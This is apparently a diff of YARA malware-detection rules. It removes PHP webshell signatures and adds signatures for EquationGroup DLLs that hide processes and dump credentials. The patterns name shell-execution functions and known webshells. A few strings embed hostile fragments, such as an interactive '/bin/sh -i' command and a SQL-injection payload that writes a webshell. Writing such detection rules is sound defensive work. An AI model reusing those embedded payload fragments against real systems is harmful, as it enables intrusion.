-		$gen_much_sus90 = "r00t" fullword wide ascii
-		$gen_much_sus91 = "xp_cmdshell" fullword wide ascii
-		$gen_much_sus92 = "DEFACE" fullword wide ascii
-		$gen_much_sus93 = "Bypass" fullword wide ascii
-		$gen_much_sus94 = /eval\s{2,20}\(/ nocase wide ascii
-		$gen_much_sus100 = "rot13" wide ascii
-		$gen_much_sus101 = "ini_set('error_log'" wide ascii
-		$gen_much_sus102 = "base64_decode(base64_decode(" wide ascii
-		$gen_much_sus103 = "=$_COOKIE;" wide ascii
-		$gen_much_sus104 = { C0 A6 7B 3? 7D 2E 24 }
-		$gen_much_sus105 = "$GLOBALS[\"__" wide ascii
-		$gen_much_sus106 = ")-0)" wide ascii
-		$gen_much_sus107 = "-0)+" wide ascii
-		$gen_much_sus108 = "+0)+" wide ascii
-		$gen_much_sus109 = "+(0/" wide ascii
-		$gen_much_sus110 = "+(0+" wide ascii
-		$gen_much_sus111 = "extract($_REQUEST)" wide ascii
-		$gen_much_sus112 = "<?php\t\t\t\t\t\t\t\t\t\t\t" wide ascii
-		$gen_much_sus113 = "\t\t\t\t\t\t\t\t\t\t\textract" wide ascii
-		$gen_much_sus114 = "\" .\"" wide ascii
-		$gen_much_sus115 = "end($_POST" wide ascii
-		$weevely1 = /';\n\$\w\s?=\s?'/ wide ascii
-		$weevely2 = /';\x0d\n\$\w\s?=\s?'/ wide ascii
-		$weevely3 = /';\$\w{1,2}='/ wide ascii
-		$weevely4 = "str_replace" fullword wide ascii
-		$gif = { 47 49 46 38 }
-		$fp1 = "# Some examples from obfuscated malware:" ascii
-		$fp2 = "* @package   PHP_CodeSniffer" ascii
-		$fp3 = ".jQuery===" ascii
-		$fp4 = "* @param string $lstat encoded LStat string" ascii
+		logic_hash = "ec8b54f3489b1eeef491b03641805e0e4db0b5cbbb67a3ae3d37dad184f54b01"
+		score = 75
+		quality = 85
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "b7902809a15c4c3864a14f009768693c66f9e9234204b873d29a87f4c3009a50"
+
+	strings:
+		$s1 = "LSASS.EXE" fullword wide
+		$s2 = "hNtQueryInformationProcess" fullword ascii
+		$s3 = "hZwOpenProcess" fullword ascii
+		$s4 = ".?AVFeFinallyFailure@@" fullword ascii
 
 	condition:
-		not ( uint16( 0 ) == 0x5a4d or uint32be( 0 ) == 0x3c3f786d or uint32be( 0 ) == 0x3c3f584d or $dex at 0 or $pack at 0 or uint16( 0 ) == 0x4b50 or 1 of ( $fp* ) ) and ( any of ( $new_php* ) or $php_short at 0 ) and ( any of ( $dynamic* ) ) and ( $gif at 0 or ( ( filesize < 1KB and ( 1 of ( $gen_much_sus* ) ) ) or ( filesize < 2KB and ( ( #weevely1 + #weevely2 + #weevely3 ) > 2 and #weevely4 > 1 ) ) or ( filesize < 4000 and ( 1 of ( $gen_much_sus* ) or 2 of ( $gen_bit_sus* ) ) ) or ( filesize < 20KB and ( 2 of ( $gen_much_sus* ) or 4 of ( $gen_bit_sus* ) ) ) or ( filesize < 50KB and ( 3 of ( $gen_much_sus* ) or 5 of ( $gen_bit_sus* ) ) ) or ( filesize < 100KB and ( 3 of ( $gen_much_sus* ) or 6 of ( $gen_bit_sus* ) ) ) or ( filesize < 160KB and ( 3 of ( $gen_much_sus* ) or 7 of ( $gen_bit_sus* ) or ( math.deviation ( 500 , filesize -500 , 89.0 ) > 70 ) ) ) or ( filesize < 500KB and ( 4 of ( $gen_much_sus* ) or 8 of ( $gen_bit_sus* ) or #gen_much_sus104 > 4 ) ) ) or ( filesize > 2KB and filesize < 1MB and ( ( math.entropy ( 500 , filesize -500 ) >= 5.7 and math.mean ( 500 , filesize -500 ) > 80 and math.deviation ( 500 , filesize -500 , 89.0 ) < 23 ) or ( math.entropy ( 500 , filesize -500 ) >= 7.7 and math.mean ( 500 , filesize -500 ) > 120 and math.mean ( 500 , filesize -500 ) < 136 and math.deviation ( 500 , filesize -500 , 89.0 ) > 65 ) ) ) )
+		( uint16( 0 ) == 0x5a4d and filesize < 90KB and ( all of ( $s* ) ) ) or ( all of them )
 }
-
-rule SIGNATURE_BASE_WEBSHELL_PHP_Encoded_Big : FILE
+rule SIGNATURE_BASE_Equationgroup_Modifyaudit_Lp : FILE
 {
 	meta:
-		description = "PHP webshell using some kind of eval with encoded blob to decode, which is checked with YARAs math.entropy module"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "c3bb7b8b-c554-5802-8955-c83722498f8b"
-		date = "2021-02-07"
-		modified = "2024-12-16"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_webshells.yar#L2340-L2426"
+		description = "EquationGroup Malware - file modifyAudit_Lp.dll"
+		author = "Florian Roth (Nextron Systems)"
+		id = "9dcfa774-0048-5bd9-ba7d-87bbdff9567a"
+		date = "2017-01-13"
+		modified = "2023-12-05"
+		reference = "https://goo.gl/tcSoiJ"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp.yar#L1355-L1372"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "1d4b374d284c12db881ba42ee63ebce2759e0b14"
-		hash = "fc0086caee0a2cd20609a05a6253e23b5e3245b8"
-		hash = "b15b073801067429a93e116af1147a21b928b215"
-		hash = "74c92f29cf15de34b8866db4b40748243fb938b4"
-		hash = "042245ee0c54996608ff8f442c8bafb8"
-		logic_hash = "9c995f9c1c5e3a70dbb8170f6d1a2fba51c0f29184a5d3647016b520f4bfc0e3"
-		score = 50
-		quality = -100
+		logic_hash = "a908d44b831a27bb584c5da936346f77f0e205658ec2ebe0e600004645894593"
+		score = 75
+		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		importance = 70
+		hash1 = "2a1f2034e80421359e3bf65cbd12a55a95bd00f2eb86cf2c2d287711ee1d56ad"
 
 	strings:
-		$new_php1 = /<\?=[\w\s@$]/ wide ascii
-		$new_php2 = "<?php" nocase wide ascii
-		$new_php3 = "<script language=\"php" nocase wide ascii
-		$php_short = "<?"
-		$cpayload1 = /\beval[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
-		$cpayload2 = /\bexec[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
-		$cpayload3 = /\bshell_exec[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
-		$cpayload4 = /\bpassthru[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
-		$cpayload6 = /\bpopen[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
-		$cpayload7 = /\bproc_open[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
-		$cpayload8 = /\bpcntl_exec[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
-		$cpayload9 = /\bassert[\n\t ]{0,500}\([^)0]/ nocase wide ascii
-		$cpayload10 = /\bpreg_replace[\n\t ]{0,500}\([^\)]{1,100}\/[ismxADSUXju]{0,11}(e|\\x65)/ nocase wide ascii
-		$cpayload12 = /\bmb_ereg_replace[\t ]{0,500}\([^\)]{1,100}'e'/ nocase wide ascii
-		$cpayload13 = /\bmb_eregi_replace[\t ]{0,500}\([^\)]{1,100}'e'/ nocase wide ascii
-		$cpayload20 = /\bcreate_function[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
-		$cpayload21 = /\bReflectionFunction[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
-		$cpayload22 = /fetchall\(PDO::FETCH_FUNC[\n\t ]{0,500}[,}\)]/ nocase wide ascii
-		$m_cpayload_preg_filter1 = /\bpreg_filter[\n\t ]{0,500}(\([^\)]|\/\*)/ nocase wide ascii
-		$m_cpayload_preg_filter2 = "'|.*|e'" nocase wide ascii
+		$s1 = "Read of audit related process memory failed" fullword wide
+		$s2 = "** This may indicate that another copy of modify_audit is already running **" fullword wide
+		$s3 = "Pattern match of code failed" fullword wide
+		$s4 = "Base for necessary auditing dll not found" fullword wide
+		$s5 = "Security auditing has been disabled" fullword wide
 
 	condition:
-		filesize < 1000KB and ( any of ( $new_php* ) or $php_short at 0 ) and ( any of ( $cpayload* ) or all of ( $m_cpayload_preg_filter* ) ) and ( filesize > 2KB and ( math.entropy ( 500 , filesize -500 ) >= 5.7 and math.mean ( 500 , filesize -500 ) > 80 and math.deviation ( 500 , filesize -500 , 89.0 ) < 24 ) or ( math.entropy ( 500 , filesize -500 ) >= 7.7 and math.mean ( 500 , filesize -500 ) > 120 and math.mean ( 500 , filesize -500 ) < 136 and math.deviation ( 500 , filesize -500 , 89.0 ) > 65 ) )
+		( uint16( 0 ) == 0x5a4d and filesize < 300KB and 3 of them ) or ( all of them )
 }
-rule SIGNATURE_BASE_WEBSHELL_PHP_Generic_Backticks : FILE
+rule SIGNATURE_BASE_Equationgroup_Processhide_Lp : FILE
 {
 	meta:
-		description = "Generic PHP webshell which uses backticks directly on user input"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "b2f1d8d0-8668-5641-8ce9-c8dd71f51f58"
-		date = "2021-01-07"
-		modified = "2023-04-05"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_webshells.yar#L2428-L2476"
+		description = "EquationGroup Malware - file ProcessHide_Lp.dll"
+		author = "Florian Roth (Nextron Systems)"
+		id = "b0842897-f591-5213-9a26-0f8732e6f3b8"
+		date = "2017-01-13"
+		modified = "2023-12-05"
+		reference = "https://goo.gl/tcSoiJ"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp.yar#L1374-L1393"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "339f32c883f6175233f0d1a30510caa52fdcaa37"
-		hash = "8db86ad90883cd208cf86acd45e67c03f994998804441705d690cb6526614d00"
-		hash = "af987b0eade03672c30c095cee0c7c00b663e4b3c6782615fb7e430e4a7d1d75"
-		hash = "67339f9e70a17af16cf51686918cbe1c0604e129950129f67fe445eaff4b4b82"
-		hash = "144e242a9b219c5570973ca26d03e82e9fbe7ba2773305d1713288ae3540b4ad"
-		hash = "8db86ad90883cd208cf86acd45e67c03f994998804441705d690cb6526614d00"
-		logic_hash = "faa064686a5632788497d0300ba017c3e564f3b70f07a01f2e49bf7c934feb28"
+		logic_hash = "407045f5ac8eeec4403560de406e5d382d38ae2f34d0e4c7d3cc9b94debdfad8"
 		score = 75
-		quality = 44
+		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		importance = 70
+		hash1 = "cdee0daa816f179e74c90c850abd427fbfe0888dcfbc38bf21173f543cdcdc66"
 
 	strings:
-		$backtick = /`\s*\{?\$(_POST\[|_GET\[|_REQUEST\[|_SERVER\['HTTP_)/ wide ascii
-		$php_short = "<?" wide ascii
-		$no_xml1 = "<?xml version" nocase wide ascii
-		$no_xml2 = "<?xml-stylesheet" nocase wide ascii
-		$no_asp1 = "<%@LANGUAGE" nocase wide ascii
-		$no_asp2 = /<script language="(vb|jscript|c#)/ nocase wide ascii
-		$no_pdf = "<?xpacket"
-		$php_new1 = /<\?=[^?]/ wide ascii
-		$php_new2 = "<?php" nocase wide ascii
-		$php_new3 = "<script language=\"php" nocase wide ascii
+		$x1 = "Invalid flag.  Can only hide or unhide" fullword wide
+		$x2 = "Process elevation failed" fullword wide
+		$x3 = "Unknown error hiding process" fullword wide
+		$x4 = "Invalid process links found in EPROCESS" fullword wide
+		$x5 = "Unable to find SYSTEM process" fullword wide
+		$x6 = "Process hidden, but EPROCESS location lost" fullword wide
+		$x7 = "Invalid EPROCESS location for given ID" fullword wide
 
 	condition:
-		(( ( $php_short in ( 0 .. 100 ) or $php_short in ( filesize -1000 .. filesize ) ) and not any of ( $no_* ) ) or any of ( $php_new* ) ) and $backtick and filesize < 200
+		( uint16( 0 ) == 0x5a4d and filesize < 300KB and 1 of them ) or ( 3 of them )
 }
-rule SIGNATURE_BASE_WEBSHELL_PHP_Generic_Backticks_OBFUSC : FILE
+rule SIGNATURE_BASE_Equationgroup_Pwdump_Implant : FILE
 {
 	meta:
-		description = "Generic PHP webshell which uses backticks directly on user input"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "5ecb329f-0755-536d-8bfa-e36158474a0b"
-		date = "2021-01-07"
-		modified = "2023-04-05"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_webshells.yar#L2478-L2524"
+		description = "EquationGroup Malware - file pwdump_Implant.dll"
+		author = "Florian Roth (Nextron Systems)"
+		id = "55984c20-539e-5e51-b3c4-caa6157c993d"
+		date = "2017-01-13"
+		modified = "2023-12-05"
+		reference = "https://goo.gl/tcSoiJ"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp.yar#L1395-L1410"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "23dc299f941d98c72bd48659cdb4673f5ba93697"
-		hash = "e3f393a1530a2824125ecdd6ac79d80cfb18fffb89f470d687323fb5dff0eec1"
-		hash = "1e75914336b1013cc30b24d76569542447833416516af0d237c599f95b593f9b"
-		hash = "8db86ad90883cd208cf86acd45e67c03f994998804441705d690cb6526614d00"
-		logic_hash = "34354283762d6f62a4537e914d969f84546339da9be533e209d8738605b7e3ac"
+		logic_hash = "20df7ef04154e317ee844545e541d62b3b8db4ac4800ba45a26b1092499c6e69"
 		score = 75
-		quality = 44
+		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		importance = 70
+		hash1 = "dfd5768a4825d1c7329c2e262fde27e2b3d9c810653585b058fcf9efa9815964"
 
 	strings:
-		$s1 = /echo[\t ]{0,500}\(?`\$/ wide ascii
-		$php_short = "<?" wide ascii
-		$no_xml1 = "<?xml version" nocase wide ascii
-		$no_xml2 = "<?xml-stylesheet" nocase wide ascii
-		$no_asp1 = "<%@LANGUAGE" nocase wide ascii
-		$no_asp2 = /<script language="(vb|jscript|c#)/ nocase wide ascii
-		$no_pdf = "<?xpacket"
-		$php_new1 = /<\?=[^?]/ wide ascii
-		$php_new2 = "<?php" nocase wide ascii
-		$php_new3 = "<script language=\"php" nocase wide ascii
+		$s1 = ".?AVFeFinallyFailure@@" fullword ascii
+		$s8 = ".?AVFeFinallySuccess@@" fullword ascii
+		$s3 = "\\system32\\win32k.sys" wide
 
 	condition:
-		filesize < 500 and ( ( ( $php_short in ( 0 .. 100 ) or $php_short in ( filesize -1000 .. filesize ) ) and not any of ( $no_* ) ) or any of ( $php_new* ) ) and $s1
+		( uint16( 0 ) == 0x5a4d and filesize < 100KB and all of them )
 }
-rule SIGNATURE_BASE_WEBSHELL_PHP_By_String_Known_Webshell : FILE
+rule SIGNATURE_BASE_Equationgroup_Equationdrug_Gen_5 : FILE
 {
 	meta:
-		description = "Known PHP Webshells which contain unique strings, lousy rule for low hanging fruits. Most are catched by other rules in here but maybe these catch different versions."
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "05ac0e0a-3a19-5c60-b89a-4a300d8c22e7"
-		date = "2021-01-09"
-		modified = "2023-04-05"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_webshells.yar#L2526-L2660"
+		description = "EquationGroup Malware - file PC_Level3_http_dll"
+		author = "Florian Roth (Nextron Systems)"
+		id = "a67655eb-5593-5ac7-a6aa-81f235fa3c33"
+		date = "2017-01-13"
+		modified = "2023-12-05"
+		reference = "https://goo.gl/tcSoiJ"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp.yar#L1412-L1428"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "d889da22893536d5965541c30896f4ed4fdf461d"
-		hash = "10f4988a191774a2c6b85604344535ee610b844c1708602a355cf7e9c12c3605"
-		hash = "7b6471774d14510cf6fa312a496eed72b614f6fc"
-		hash = "decda94d40c3fd13dab21e197c8d05f48020fa498f4d0af1f60e29616009e9bf"
-		hash = "ef178d332a4780e8b6db0e772aded71ac1a6ed09b923cc359ba3c4efdd818acc"
-		hash = "a7a937c766029456050b22fa4218b1f2b45eef0db59b414f79d10791feca2c0b"
-		hash = "e7edd380a1a2828929fbde8e7833d6e3385f7652ea6b352d26b86a1e39130ee8"
-		hash = "0038946739956c80d75fa9eeb1b5c123b064bbb9381d164d812d72c7c5d13cac"
-		hash = "3a7309bad8a5364958081042b5602d82554b97eca04ee8fdd8b671b5d1ddb65d"
-		hash = "a78324b9dc0b0676431af40e11bd4e26721a960c55e272d718932bdbb755a098"
-		hash = "a27f8cd10cedd20bff51e9a8e19e69361cc8a6a1a700cc64140e66d160be1781"
-		hash = "9bbd3462993988f9865262653b35b4151386ed2373592a1e2f8cf0f0271cdb00"
-		hash = "459ed1d6f87530910361b1e6065c05ef0b337d128f446253b4e29ae8cc1a3915"
-		hash = "12b34d2562518d339ed405fb2f182f95dce36d08fefb5fb67cc9386565f592d1"
-		hash = "96d8ca3d269e98a330bdb7583cccdc85eab3682f9b64f98e4f42e55103a71636"
-		hash = "312ee17ec9bed4278579443b805c0eb75283f54483d12f9add7d7d9e5f9f6105"
-		hash = "15c4e5225ff7811e43506f0e123daee869a8292fc8a38030d165cc3f6a488c95"
-		hash = "0c845a031e06925c22667e101a858131bbeb681d78b5dbf446fdd5bca344d765"
-		hash = "d52128bcfff5e9a121eab3d76382420c3eebbdb33cd0879fbef7c3426e819695"
-		logic_hash = "22b6d58e24748933792c29b63c4f68c08b86c17a2751fbef5b93bc06c8c5341d"
-		score = 70
-		quality = -8
+		logic_hash = "834a7175a23c30301fce01482a2768d453368c7ca5c72ae52b2d266b31005991"
+		score = 75
+		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		importance = 70
+		hash1 = "4ebfc1f6ec6a0e68e47e5b231331470a4483184cf715a578191b91ba7c32094d"
 
 	strings:
-		$pbs1 = "b374k shell" wide ascii
-		$pbs2 = "b374k/b374k" wide ascii
-		$pbs3 = "\"b374k" wide ascii
-		$pbs4 = "$b374k(\"" wide ascii
-		$pbs5 = "b374k " wide ascii
-		$pbs6 = "0de664ecd2be02cdd54234a0d1229b43" wide ascii
-		$pbs7 = "pwnshell" wide ascii
-		$pbs8 = "reGeorg" fullword wide ascii
-		$pbs9 = "Georg says, 'All seems fine" fullword wide ascii
-		$pbs10 = "My PHP Shell - A very simple web shell" wide ascii
-		$pbs11 = "<title>My PHP Shell <?echo VERSION" wide ascii
-		$pbs12 = "F4ckTeam" fullword wide ascii
-		$pbs15 = "MulCiShell" fullword wide ascii
-		$pbs30 = "bot|spider|crawler|slurp|teoma|archive|track|snoopy|java|lwp|wget|curl|client|python|libwww" wide ascii
-		$pbs35 = /@\$_GET\s?\[\d\]\)\.@\$_\(\$_GET\s?\[\d\]\)/ wide ascii
-		$pbs36 = /@\$_GET\s?\[\d\]\)\.@\$_\(\$_POST\s?\[\d\]\)/ wide ascii
-		$pbs37 = /@\$_POST\s?\[\d\]\)\.@\$_\(\$_GET\s?\[\d\]\)/ wide ascii
-		$pbs38 = /@\$_POST\[\d\]\)\.@\$_\(\$_POST\[\d\]\)/ wide ascii
-		$pbs39 = /@\$_REQUEST\[\d\]\)\.@\$_\(\$_REQUEST\[\d\]\)/ wide ascii
-		$pbs42 = "array(\"find config.inc.php files\", \"find / -type f -name config.inc.php\")" wide ascii
-		$pbs43 = "$_SERVER[\"\\x48\\x54\\x54\\x50" wide ascii
-		$pbs52 = "preg_replace(\"/[checksql]/e\""
-		$pbs53 = "='http://www.zjjv.com'"
-		$pbs54 = "=\"http://www.zjjv.com\""
-		$pbs60 = /setting\["AccountType"\]\s?=\s?3/
-		$pbs61 = "~+d()\"^\"!{+{}"
-		$pbs62 = "use function \\eval as "
-		$pbs63 = "use function \\assert as "
-		$pbs64 = "eval(`/*" wide ascii
-		$pbs65 = "/* Reverse engineering of this file is strictly prohibited. File protected by copyright law and provided under license. */" wide ascii
-		$pbs66 = "Tas9er" fullword wide ascii
-		$pbs67 = "\"TSOP_\";" fullword wide ascii
-		$pbs68 = "str_rot13('nffreg')" wide ascii
-		$pbs69 = "<?=`{$'" wide ascii
-		$pbs70 = "{'_'.$_}[\"_\"](${'_'.$_}[\"_" wide ascii
-		$pbs71 = "\"e45e329feb5d925b\"" wide ascii
-		$pbs72 = "| PHP FILE MANAGER" wide ascii
-		$pbs73 = "\neval(htmlspecialchars_decode(gzinflate(base64_decode($" wide ascii
-		$pbs74 = "/*\n\nShellindir.org\n\n*/" wide ascii
-		$pbs75 = "$shell = 'uname -a; w; id; /bin/sh -i';" wide ascii
-		$pbs76 = "'password' . '/' . 'id' . '/' . " wide ascii
-		$pbs77 = "= create_function /*" wide ascii
-		$pbs78 = "W3LL M!N! SH3LL" wide ascii
-		$pbs79 = "extract($_REQUEST)&&@$" wide ascii
-		$pbs80 = "\"P-h-p-S-p-y\"" wide ascii
-		$pbs81 = "\\x5f\\x72\\x6f\\x74\\x31\\x33" wide ascii
-		$pbs82 = "\\x62\\x61\\x73\\x65\\x36\\x34\\x5f" wide ascii
-		$pbs83 = "*/base64_decode/*" wide ascii
-		$pbs84 = "\n@eval/*" wide ascii
-		$pbs85 = "*/eval/*" wide ascii
-		$pbs86 = "*/ array /*" wide ascii
-		$pbs87 = "2jtffszJe" wide ascii
-		$pbs88 = "edocne_46esab" wide ascii
-		$pbs89 = "eval($_HEADERS" wide ascii
-		$pbs90 = ">Infinity-Sh3ll<" ascii
-		$front1 = "<?php eval(" nocase wide ascii
-		$php_short = "<?" wide ascii
-		$no_xml1 = "<?xml version" nocase wide ascii
-		$no_xml2 = "<?xml-stylesheet" nocase wide ascii
-		$no_asp1 = "<%@LANGUAGE" nocase wide ascii
-		$no_asp2 = /<script language="(vb|jscript|c#)/ nocase wide ascii
-		$no_pdf = "<?xpacket"
-		$php_new1 = /<\?=[^?]/ wide ascii
-		$php_new2 = "<?php" nocase wide ascii
-		$php_new3 = "<script language=\"php" nocase wide ascii
-		$dex = { 64 65 ( 78 | 79 ) 0a 30 }
-		$pack = { 50 41 43 4b 00 00 00 02 00 }
+		$s1 = "Psxssdll.dll" fullword wide
+		$s2 = "Posix Server Dll" fullword wide
+		$s3 = "itanium" fullword wide
+		$s6 = "Copyright (C) Microsoft" fullword wide
 
 	condition:
-		filesize < 1000KB and ( ( ( $php_short in ( 0 .. 100 ) or $php_short in ( filesize -1000 .. filesize ) ) and not any of ( $no_* ) ) or any of ( $php_new* ) ) and not ( uint16( 0 ) == 0x5a4d or $dex at 0 or $pack at 0 or uint16( 0 ) == 0x4b50 ) and ( any of ( $pbs* ) or $front1 in ( 0 .. 60 ) )
+		( uint16( 0 ) == 0x5a4d and filesize < 300KB and all of them )
 }
-rule SIGNATURE_BASE_WEBSHELL_PHP_Strings_SUSP : FILE
+rule SIGNATURE_BASE_Equationgroup_PC_Level3_Http_Flav_Dll : FILE
 {
 	meta:
-		description = "typical webshell strings, suspicious"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "25f25df5-4398-562b-9383-e01ccb17e8de"
-		date = "2021-01-12"
-		modified = "2023-07-05"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_webshells.yar#L2662-L2748"
+		description = "EquationGroup Malware - file PC_Level3_http_flav_dll"
+		author = "Florian Roth (Nextron Systems)"
+		id = "4bc4804b-c6d2-5c94-b451-24bb0f3dba43"
+		date = "2017-01-13"
+		modified = "2023-12-05"
+		reference = "https://goo.gl/tcSoiJ"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp.yar#L1430-L1447"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "0dd568dbe946b5aa4e1d33eab1decbd71903ea04"
-		hash = "dde2bdcde95730510b22ae8d52e4344997cb1e74"
-		hash = "499db4d70955f7d40cf5cbaf2ecaf7a2"
-		hash = "281b66f62db5caab2a6eb08929575ad95628a690"
-		hash = "1ab3ae4d613b120f9681f6aa8933d66fa38e4886"
-		logic_hash = "5c3837ab761ee2209fab5fc333b050a56d80addb03b088ae28040c7393429bb3"
-		score = 50
-		quality = 40
+		logic_hash = "579539961e29c4da60dc632b1afd348e0d799e266f175a3bae7206b615d90f5b"
+		score = 75
+		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		importance = 70
+		hash1 = "27972d636b05a794d17cb3203d537bcf7c379fafd1802792e7fb8e72f130a0c4"
 
 	strings:
-		$sstring1 = "eval(\"?>\"" nocase wide ascii
-		$php_short = "<?" wide ascii
-		$no_xml1 = "<?xml version" nocase wide ascii
-		$no_xml2 = "<?xml-stylesheet" nocase wide ascii
-		$no_asp1 = "<%@LANGUAGE" nocase wide ascii
-		$no_asp2 = /<script language="(vb|jscript|c#)/ nocase wide ascii
-		$no_pdf = "<?xpacket"
-		$php_new1 = /<\?=[^?]/ wide ascii
-		$php_new2 = "<?php" nocase wide ascii
-		$php_new3 = "<script language=\"php" nocase wide ascii
-		$gfp1 = "eval(\"return [$serialised_parameter"
-		$gfp2 = "$this->assert(strpos($styles, $"
-		$gfp3 = "$module = new $_GET['module']($_GET['scope']);"
-		$gfp4 = "$plugin->$_POST['action']($_POST['id']);"
-		$gfp5 = "$_POST[partition_by]($_POST["
-		$gfp6 = "$object = new $_REQUEST['type']($_REQUEST['id']);"
-		$gfp7 = "The above example code can be easily exploited by passing in a string such as"
-		$gfp8 = "Smarty_Internal_Debug::start_render($_template);"
-		$gfp9 = "?p4yl04d=UNION%20SELECT%20'<?%20system($_GET['command']);%20?>',2,3%20INTO%20OUTFILE%20'/var/www/w3bsh3ll.php"
-		$gfp10 = "[][}{;|]\\|\\\\[+=]\\|<?=>?"
-		$gfp11 = "(eval (getenv \"EPROLOG\")))"
-		$gfp12 = "ZmlsZV9nZXRfY29udGVudHMoJ2h0dHA6Ly9saWNlbnNlLm9wZW5jYXJ0LWFwaS5jb20vbGljZW5zZS5waHA/b3JkZXJ"
-		$inp1 = "php://input" wide ascii
-		$inp2 = /_GET\s?\[/ wide ascii
-		$inp3 = /\(\s?\$_GET\s?\)/ wide ascii
-		$inp4 = /_POST\s?\[/ wide ascii
-		$inp5 = /\(\s?\$_POST\s?\)/ wide ascii
-		$inp6 = /_REQUEST\s?\[/ wide ascii
-		$inp7 = /\(\s?\$_REQUEST\s?\)/ wide ascii
-		$inp15 = "_SERVER['HTTP_" wide ascii
-		$inp16 = "_SERVER[\"HTTP_" wide ascii
-		$inp17 = /getenv[\t ]{0,20}\([\t ]{0,20}['"]HTTP_/ wide ascii
-		$inp18 = "array_values($_SERVER)" wide ascii
-		$inp19 = /file_get_contents\("https?:\/\// wide ascii
+		$s1 = "Psxssdll.dll" fullword wide
+		$s2 = "Posix Server Dll" fullword wide
+		$s4 = "itanium" fullword wide
+		$s5 = "RHTTP/1.0" fullword wide
+		$s8 = "Copyright (C) Microsoft" fullword wide
 
 	condition:
-		filesize < 700KB and ( ( ( $php_short in ( 0 .. 100 ) or $php_short in ( filesize -1000 .. filesize ) ) and not any of ( $no_* ) ) or any of ( $php_new* ) ) and not ( any of ( $gfp* ) ) and ( 1 of ( $sstring* ) and ( any of ( $inp* ) ) )
+		( uint16( 0 ) == 0x5a4d and filesize < 300KB and all of them )
 }
-rule SIGNATURE_BASE_WEBSHELL_PHP_In_Htaccess : FILE
+rule SIGNATURE_BASE_Equationgroup_LSADUMP_Lp : FILE
 {
 	meta:
-		description = "Use Apache .htaccess to execute php code inside .htaccess"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "0f5edff9-22b2-50c9-ae81-72698ea8e7db"
-		date = "2021-01-07"
-		modified = "2023-07-05"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_webshells.yar#L2750-L2772"
+		description = "EquationGroup Malware - file LSADUMP_Lp.dll"
+		author = "Florian Roth (Nextron Systems)"
+		id = "8068ca41-6365-5c97-82f2-be9ad89628e0"
+		date = "2017-01-13"
+		modified = "2023-12-05"
+		reference = "https://goo.gl/tcSoiJ"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp.yar#L1449-L1462"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "c026d4512a32d93899d486c6f11d1e13b058a713"
-		hash = "d79e9b13a32a9e9f3fa36aa1a4baf444bfd2599a"
-		hash = "e1d1091fee6026829e037b2c70c228344955c263"
-		hash = "c026d4512a32d93899d486c6f11d1e13b058a713"
-		hash = "8c9e65cd3ef093cd9c5b418dc5116845aa6602bc92b9b5991b27344d8b3f7ef2"
